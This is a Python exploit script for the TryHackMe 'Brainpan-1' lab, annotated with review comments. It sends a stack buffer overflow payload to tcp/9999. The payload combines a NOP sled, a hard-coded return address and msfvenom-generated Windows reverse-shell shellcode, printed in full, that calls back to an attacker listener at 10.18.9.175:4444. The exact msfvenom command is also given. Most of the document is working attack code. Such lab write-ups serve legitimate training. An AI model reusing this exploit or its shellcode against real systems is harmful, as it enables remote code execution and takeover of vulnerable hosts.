
THM - Brainpan-1

Exploit

#!/usr/bin/env python3
# Flat proof-of-concept script for the THM "Brainpan-1" lab: builds a fixed
# 1000-byte buffer and writes it once to the lab service on tcp/9999.
# NOTE(review): `time` and `subprocess` are imported but never used below.
import socket, time, sys, subprocess

# Lab target address and port; both are hard-coded, nothing is parsed from argv.
ip = "10.10.55.121"
port = 9999

# Earlier iterations kept for reference (commented out): a plain filler send,
# then a filler/marker layout used while measuring the overwrite offset.
# payload = (b"A" * 100)
# payload = (b"A" * 524) + (b"B" * 4) + (b"C" * 468) + (b"D"*4)

# The address below is written into the payload reversed (little-endian);
# the third line is the byte order actually used.
# 0x311712f3
# \x31\x17\x12\xf3
# \xf3\x12\x17\x31

# payload = (b"A" * 524) + (b"\xf3\x12\x17\x31") + (b"C" * (468)) + (b"D"*4)

# `buf` is generated output of the msfvenom command quoted on the next line
# (a windows/shell_reverse_tcp stage with \x00 excluded); it calls back to
# the LHOST/LPORT baked in at generation time, so this script is tied to
# that specific listener.  The bytes are opaque here and are not decoded.
# msfvenom -p windows/shell_reverse_tcp LHOST=10.18.9.175 LPORT=4444 -b "\x00" -f python EXITFUNC=thread
buf =  b""
buf += b"\xda\xcb\xbb\x82\x84\x36\x0b\xd9\x74\x24\xf4\x5e\x2b"
buf += b"\xc9\xb1\x52\x31\x5e\x17\x03\x5e\x17\x83\x6c\x78\xd4"
buf += b"\xfe\x8c\x69\x9b\x01\x6c\x6a\xfc\x88\x89\x5b\x3c\xee"
buf += b"\xda\xcc\x8c\x64\x8e\xe0\x67\x28\x3a\x72\x05\xe5\x4d"
buf += b"\x33\xa0\xd3\x60\xc4\x99\x20\xe3\x46\xe0\x74\xc3\x77"
buf += b"\x2b\x89\x02\xbf\x56\x60\x56\x68\x1c\xd7\x46\x1d\x68"
buf += b"\xe4\xed\x6d\x7c\x6c\x12\x25\x7f\x5d\x85\x3d\x26\x7d"
buf += b"\x24\x91\x52\x34\x3e\xf6\x5f\x8e\xb5\xcc\x14\x11\x1f"
buf += b"\x1d\xd4\xbe\x5e\x91\x27\xbe\xa7\x16\xd8\xb5\xd1\x64"
buf += b"\x65\xce\x26\x16\xb1\x5b\xbc\xb0\x32\xfb\x18\x40\x96"
buf += b"\x9a\xeb\x4e\x53\xe8\xb3\x52\x62\x3d\xc8\x6f\xef\xc0"
buf += b"\x1e\xe6\xab\xe6\xba\xa2\x68\x86\x9b\x0e\xde\xb7\xfb"
buf += b"\xf0\xbf\x1d\x70\x1c\xab\x2f\xdb\x49\x18\x02\xe3\x89"
buf += b"\x36\x15\x90\xbb\x99\x8d\x3e\xf0\x52\x08\xb9\xf7\x48"
buf += b"\xec\x55\x06\x73\x0d\x7c\xcd\x27\x5d\x16\xe4\x47\x36"
buf += b"\xe6\x09\x92\x99\xb6\xa5\x4d\x5a\x66\x06\x3e\x32\x6c"
buf += b"\x89\x61\x22\x8f\x43\x0a\xc9\x6a\x04\x3f\x1c\x7d\x7b"
buf += b"\x57\x22\x7d\x92\xf4\xab\x9b\xfe\x14\xfa\x34\x97\x8d"
buf += b"\xa7\xce\x06\x51\x72\xab\x09\xd9\x71\x4c\xc7\x2a\xff"
buf += b"\x5e\xb0\xda\x4a\x3c\x17\xe4\x60\x28\xfb\x77\xef\xa8"
buf += b"\x72\x64\xb8\xff\xd3\x5a\xb1\x95\xc9\xc5\x6b\x8b\x13"
buf += b"\x93\x54\x0f\xc8\x60\x5a\x8e\x9d\xdd\x78\x80\x5b\xdd"
buf += b"\xc4\xf4\x33\x88\x92\xa2\xf5\x62\x55\x1c\xac\xd9\x3f"
buf += b"\xc8\x29\x12\x80\x8e\x35\x7f\x76\x6e\x87\xd6\xcf\x91"
buf += b"\x28\xbf\xc7\xea\x54\x5f\x27\x21\xdd\x7f\xca\xe3\x28"
buf += b"\xe8\x53\x66\x91\x75\x64\x5d\xd6\x83\xe7\x57\xa7\x77"
buf += b"\xf7\x12\xa2\x3c\xbf\xcf\xde\x2d\x2a\xef\x4d\x4d\x7f"


# Layout, left to right: 524 bytes of 0x90 filler, the 4-byte address from the
# comment above, 0x90 padding sized so that padding + buf is exactly 468 bytes,
# buf itself, then 4 trailing "D" bytes.  The total is therefore always 1000
# bytes (as long as buf fits in 468).  A single ~1 KB write dominated by long
# runs of 0x90 to this port is the signature a defender can look for.
# NOTE(review): if len(buf) ever exceeded 468 the padding term would be
# negative and silently produce b"", shifting the layout; nothing checks this.
payload = (b"\x90" * 524) + (b"\xf3\x12\x17\x31") + (b"\x90" * (468 - len(buf))) + buf + (b"D"*4)


# Dumps the full raw payload to stdout.  (Message text misspells "Payload".)
print("Pyadlod size: {} payload: {}".format(len(payload), payload))

try:
    # `with` closes the socket on every exit path, including the except below.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(5)
        s.connect((ip, port))
        # Banner read; a timeout here (socket.timeout) lands in the except.
        print(s.recv(1024))
        # NOTE(review): send() may transmit fewer bytes than len(payload);
        # the return value is not checked.
        s.send(payload)
        print(s.recv(1024))
except:
    # Bare except: also catches KeyboardInterrupt/SystemExit and hides the
    # actual error (refused connection, timeout, reset), reporting every
    # failure as a "crash".  Message text misspells "crashed".
    print("Fuzzing crached at {} bytes".format(len(payload)))
    sys.exit(0)